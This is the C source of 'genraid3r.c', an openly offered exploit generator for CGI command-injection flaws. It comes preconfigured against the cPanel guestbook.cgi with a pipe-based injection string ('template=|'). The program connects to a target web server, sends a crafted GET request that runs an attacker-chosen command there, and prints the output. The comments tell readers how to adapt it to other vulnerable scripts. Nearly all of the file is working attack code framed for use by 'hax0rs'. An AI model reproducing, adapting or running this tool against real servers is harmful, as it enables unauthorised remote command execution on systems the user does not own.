/* Begin genraid3r.c */
/* By J0hny_Lightning */
/* j0hnylightning@hotmail.com */
/*
** genraid3r.c is a cgi exploit generator for lazy hax0rs who don’t want to use the web browser to do their stuff. 
** All u **need to do is modify some of the strings and compile to get an exploit for whatever cgi vuln. It will execute your **command on the
** web server and print the output to stdout. Tested on FreeBSD 4.6.
**
** The strings you will need to change are:
** 1) PATH This is the path to the vulnerable script. (ie: "/cgi-bin/forum/postit.cgi")
**
** 2) PART_ONE This is a string that is the first series of arguments to the vulnerable script before the command is **
** executed. For example if your are exploiting the cpanel guestbook.cgi you should set part_one to: **
   "?user=cpanel&template=|"
**
** 3) PART_TWO This is a string that is the last series of arguments to be passed to the script after the command to **
** be executed. Sticking with our example, part_two should be set to “|”
**
** Compile using: gcc genraid3r.c -o genraid3r
** Usage: ./genraid3r <hostname> <command>
**
** Note: When you specify <command> if it has a space make sure to specify the unicode representation of the space **character.
** (ie: ls -al should be ls%20-al)
**
*/
/* Includes */
#include <stdio.h>              // Standard includes for i/o,
#include <errno.h>              // error reporting, and string
#include <string.h>             // functions.
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>          // Standard includes for
#include <sys/socket.h>         // networking functions.
#include <netinet/in.h>
#include <arpa/inet.h>
/* oO0OooO0OooO0Oo Change these defines! oO0OooO0OooO0Oo */
#define PATH "/cgi-sys/guestbook.cgi"   /* Path to the script */
#define PART_ONE "?user=cpanel&template=|"      /* First set of args */
#define PART_TWO "|"            /* 2nd set of args */
/* Changing anything below this line voids the warranty */
#define DEST_PORT 80
#define MAXBUF 1024
int main(int argc, char *argv[])
{
  int sizock, own3d;
  struct hostent *toBeOwned;
  struct sockaddr_in addy;
  char bizuffer[MAXBUF];
  if (argc != 3) {
    fprintf(stderr, "Usage: %s <host name> <command>\n", argv[0]);
    exit(1);
  }
  if ((toBeOwned = (struct hostent *) gethostbyname(argv[1])) == NULL) {
    herror("gethostbyname()");
    exit(1);
  }
  if ((sizock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
    perror("socket()");
    exit(1);
  }
  addy.sin_family = AF_INET;
  addy.sin_port = htons(DEST_PORT);
  bcopy(toBeOwned->h_addr, (char *) &addy.sin_addr, toBeOwned->h_length);
  memset(&(addy.sin_zero), '\0', 8);
  if ((connect(sizock, (struct sockaddr *) &addy, sizeof(addy))) < 0) {
    perror("connect()");
    exit(1);
  }
  fprintf(stdout, "Hey! Hey! Time for 0day...\n\n");
  sprintf(bizuffer, "GET %s%s%s%s \n\n", PATH, PART_ONE, argv[2], PART_TWO);
  send(sizock, bizuffer, strlen(bizuffer), 0);
  fflush(stdout);
  do {
    bzero(bizuffer, sizeof(bizuffer));
    own3d = recv(sizock, bizuffer, sizeof(bizuffer), 0);
    if (own3d > 0)
      fprintf(stdout, "%s", bizuffer);
  }
  while (own3d > 0);
  close(sizock);
  return 0;
}

/* End genraid3r.c */